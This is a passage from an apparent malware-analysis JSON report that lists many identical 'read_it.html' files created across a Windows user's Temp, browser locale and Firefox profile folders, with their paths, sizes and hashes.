"f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_115", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\sr\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_116", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\sl\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_117", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\sk\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_118", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\ru\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_119", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\ro\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_120", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\pt_pt\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_121", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\pt_br\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_122", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\pl\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_123", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\no\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_124", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\nl\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_125", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\lv\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_126", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\lt\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_127", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\ko\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_128", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\ja\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_129", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\it\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_130", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\id\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_131", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\hu\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_132", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\hr\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_133", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\hi\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_134", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\he\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_135", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\fr\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_136", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\fil\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_137", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\fi\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_138", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\es\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_139", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\en\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_140", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\el\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_141", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\de\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_142", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\da\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_143", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\cs\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_144", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\ca\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_145", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\bg\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_146", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\ar\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_147", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\outlook logging\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_148", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\low\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_149", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\history\\history.ie5\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_150", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\cookies\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_151", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\updates\\e7cf176e110c211b\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_152", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\updates\\e7cf176e110c211b\\updates\\0\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_153", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_154", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\thumbnails\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_155", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\startupcache\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_156", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\safebrowsing\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_163", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\mozilla\\firefox\\profiles\\5cb79syl.default\\indexeddb\\moz-safe-about+home\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_186", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\uk\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_195", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\offlinecache\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_197", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_199", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\f\\a2\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_201", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\f\\94\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_203", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\f\\23\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_205", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\e\\e9\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_207", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\e\\69\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_209", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\e\\57\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_211", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\e\\45\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_213", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\d\\fe\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_215", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\d\\08\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": 